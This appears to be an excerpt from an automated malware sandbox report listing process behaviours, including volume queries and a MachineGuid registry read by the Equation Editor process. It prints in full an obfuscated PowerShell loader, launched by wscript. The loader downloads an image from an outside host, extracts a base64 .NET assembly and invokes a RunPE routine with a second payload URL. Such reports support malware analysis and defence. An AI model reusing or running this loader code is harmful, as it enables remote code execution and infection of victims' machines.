Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "('sevlink = 8zkhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358zk; sevwebclient = new-object system.net.webclient; try { sevdownloadeddata = sevwebclient.downloaddata(sevlink) } catch { write-host 8zkfailed to download data from sev'+'link'+'8zk -foregroundcolor red; exit }; i'+'f'+' (sevdownloadeddata -ne sevnull) { sevimagetext = [system.text.encoding'+']::utf8.getstring(sevdownloadeddata); sevstartflag = 8zk<<base64_start>>8zk; sevendflag = 8zk<<base64_end>>8zk; sevstartindex = sevimagetext.indexof(sevstartflag); sevendindex = sevimagetext.indexof(sevendflag); if (sevstartindex -ge 0 -and sevendi'+'ndex -gt sevsta'+'rtindex) { sevs'+'tar'+'tindex += sevstartflag.length; sev'+'ba'+'se64l'+'ength = sevendinde'+'x - sevstartindex; sevba'+'se64command = sevimagetext.substring(sevstartindex, sevbase64length); sevcommandbytes = [system.convert]::frombase64string(sevbase64command); sevloadedassembly = [system.reflection.a'+'ssembly]::load(sevcommandbytes); sevtyp'+'e = sevloadedassembly.gettyp'+'e(8zkrunpe.home8zk); sevmethod = sevtype.ge'+'tmethod(8zkvai8zk).invoke(sevnull, [object[]] '+'(8zktxt.sero/44133/931.871.64.891//:ptth8zk , 8zkd'+'esativado8zk , 8zkdesativado8zk , 8zk'+'desativado8zk,8zkregasm8zk,8zk8zk)) } }').replace('8zk',[string][char]39).replace(([char]83+[char]101+[char]86),[string][char]36)| &( $pshome[4]+$pshome[34]+'x')"			Jump to behavior

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior